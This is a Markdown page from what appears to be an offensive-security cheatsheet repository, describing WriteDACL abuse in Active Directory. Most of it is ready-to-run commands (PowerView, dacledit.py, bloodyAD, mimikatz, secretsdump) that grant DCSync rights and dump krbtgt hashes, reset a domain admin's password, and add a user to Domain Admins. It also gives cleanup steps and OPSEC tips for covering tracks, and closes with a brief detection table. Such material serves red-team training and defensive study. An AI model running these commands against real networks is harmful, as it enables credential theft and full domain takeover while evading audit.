daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-21-writedacl-abuse.md (7142B)


      1 ---
      2 title: "Attack #21 โ€” WriteDACL Abuse"
      3 description: "WriteDACL allows an attacker to modify the Discretionary Access Control List of a target AD object โ€” meaning they can grant themselves (or any principal)โ€ฆ"
      4 category: active-directory
      5 subcategory: "ACL Abuse"
      6 tags: ["active-directory", "credential-access", "privilege-escalation", "hashing"]
      7 tools: ["Impacket", "Mimikatz", "BloodHound", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Three/๐ŸŸก Attack #21 โ€” WriteDACL Abuse.md"
     11 ---
     12 # ๐ŸŸก Attack #21 โ€” WriteDACL Abuse
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 WriteDACL allows an attacker to **modify the Discretionary Access Control List** of a target AD object โ€” meaning they can grant themselves (or any principal) **any permission they want** on that object. This is typically used as a **stepping stone**: the attacker grants themselves GenericAll or DCSync rights, then uses those elevated permissions to exploit the target.
     19 
     20 The most devastating use is WriteDACL on the **domain root object** (`DC=corp,DC=local`), which allows the attacker to grant themselves DCSync rights โ€” enabling extraction of every credential in the domain without Domain Admin privileges.
     21 
     22 ### Exploitation Chain
     23 
     24 ```
     25 1. Identify WriteDACL on a target object (BloodHound / PowerView)
     26 2. Add a new ACE granting yourself desired rights:
     27    - GenericAll on user/group โ†’ password reset / group membership
     28    - DCSync rights on domain root โ†’ extract all hashes
     29 3. Exploit the newly granted permissions
     30 4. Optionally remove the ACE to cover tracks
     31 ```
     32 
     33 ***
     34 
     35 ## โš™๏ธ Prerequisites
     36 
     37 | Requirement | Detail |
     38 |---|---|
     39 | **WriteDACL ACE on target** | Your controlled principal must have WriteDACL in the target's DACL |
     40 | **Domain user account** | Any authenticated domain user |
     41 
     42 ***
     43 
     44 ## ๐Ÿ› ๏ธ Tools
     45 
     46 | Tool | Platform | Notes |
     47 |---|---|---|
     48 | **PowerView** | Windows | `Add-DomainObjectAcl` โ€” add ACEs to DACLs |
     49 | **Impacket โ€” dacledit.py** | Linux | Remote DACL editing |
     50 | **bloodyAD** | Linux | `add dcsync`, `add genericAll` shortcuts |
     51 | **ldap_shell** | Linux | Interactive LDAP exploitation |
     52 
     53 ***
     54 
     55 ## ๐Ÿ’ป Full Commands
     56 
     57 ### ๐Ÿ”ด WriteDACL on Domain Root โ†’ Grant DCSync
     58 
     59 ```powershell
     60 # โ”€โ”€ PowerView โ€” grant DCSync rights to yourself โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     61 Import-Module .\PowerView.ps1
     62 Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \
     63   -PrincipalIdentity low_user -Rights DCSync -Verbose
     64 
     65 # โ”€โ”€ Now DCSync โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     66 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit
     67 ```
     68 
     69 ```bash
     70 # โ”€โ”€ dacledit.py โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     71 dacledit.py -action write -rights DCSync \
     72   -principal low_user -target-dn "DC=corp,DC=local" \
     73   corp.local/low_user:'Password1' -dc-ip 10.10.10.10
     74 
     75 # Now DCSync
     76 secretsdump.py corp.local/low_user:'Password1'@DC01.corp.local -just-dc-user krbtgt
     77 
     78 # โ”€โ”€ bloodyAD โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     79 bloodyAD -d corp.local -u low_user -p 'Password1' --host DC01.corp.local \
     80   add dcsync low_user
     81 ```
     82 
     83 ### ๐Ÿ”ด WriteDACL on User โ†’ Grant GenericAll
     84 
     85 ```powershell
     86 # โ”€โ”€ Grant GenericAll over a DA account โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     87 Add-DomainObjectAcl -TargetIdentity targetadmin -PrincipalIdentity low_user -Rights All
     88 
     89 # โ”€โ”€ Now reset their password โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     90 $NewPassword = ConvertTo-SecureString 'P@ssword123!' -AsPlainText -Force
     91 Set-DomainUserPassword -Identity targetadmin -AccountPassword $NewPassword
     92 ```
     93 
     94 ```bash
     95 # โ”€โ”€ dacledit.py โ€” grant GenericAll โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     96 dacledit.py -action write -rights FullControl \
     97   -principal low_user -target targetadmin \
     98   corp.local/low_user:'Password1' -dc-ip 10.10.10.10
     99 ```
    100 
    101 ### ๐Ÿ”ด WriteDACL on Group โ†’ Grant Self-Add
    102 
    103 ```powershell
    104 # โ”€โ”€ Grant yourself rights to modify group membership โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    105 Add-DomainObjectAcl -TargetIdentity "Domain Admins" \
    106   -PrincipalIdentity low_user -Rights All
    107 
    108 # โ”€โ”€ Add yourself to Domain Admins โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    109 Add-DomainGroupMember -Identity "Domain Admins" -Members low_user
    110 ```
    111 
    112 ### ๐Ÿ”ด Cleanup โ€” Remove the ACE
    113 
    114 ```powershell
    115 # โ”€โ”€ Remove the ACE you added โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    116 Remove-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" \
    117   -PrincipalIdentity low_user -Rights DCSync -Verbose
    118 ```
    119 
    120 ```bash
    121 # โ”€โ”€ dacledit.py cleanup โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    122 dacledit.py -action remove -rights DCSync \
    123   -principal low_user -target-dn "DC=corp,DC=local" \
    124   corp.local/low_user:'Password1' -dc-ip 10.10.10.10
    125 ```
    126 
    127 ***
    128 
    129 ## ๐ŸŽฏ OPSEC Tips
    130 
    131 - **Always remove the ACE after exploitation** โ€” leaving DCSync rights on a low-priv user is a permanent IOC
    132 - **WriteDACL โ†’ DCSync is the most common escalation path** found in ACL-based attacks
    133 - **Event 4662 and 5136 catch DACL modifications** โ€” but many environments don't audit these events
    134 
    135 ***
    136 
    137 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
    138 
    139 | Event ID | Source | What to Look For |
    140 |---|---|---|
    141 | **4662** | Security Log (DC) | Object access โ€” tracks DACL writes on the domain root |
    142 | **5136** | Security Log (DC) | Directory Service object modification โ€” nTSecurityDescriptor changes |
    143 | **4670** | Security Log (DC) | Permissions on an object were changed |
    144 
    145 ***
    146 
    147 ## ๐Ÿ”— Attack Chain Context
    148 
    149 ```
    150 [WriteDACL] โ”€โ”€โ†’ Grant Yourself Any Permission
    151          โ”‚
    152          โ”œโ”€โ”€โ†’ ๐Ÿฉธ Domain root โ†’ DCSync rights โ†’ all domain hashes
    153          โ”œโ”€โ”€โ†’ ๐Ÿ‘ค User object โ†’ GenericAll โ†’ password reset โ†’ account takeover
    154          โ”œโ”€โ”€โ†’ ๐Ÿ‘ฅ Group object โ†’ modify membership โ†’ add self to DA
    155          โ”œโ”€โ”€โ†’ ๐Ÿ”— Chain: WriteDACL โ†’ DCSync (#37) โ†’ Golden Ticket (#11)
    156          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: audit DACLs, monitor 4670/5136, least privilege
    157 ```
    158 
    159 ***
    160 
    161 > โœ… **Attack #21 โ€” WriteDACL Abuse complete.**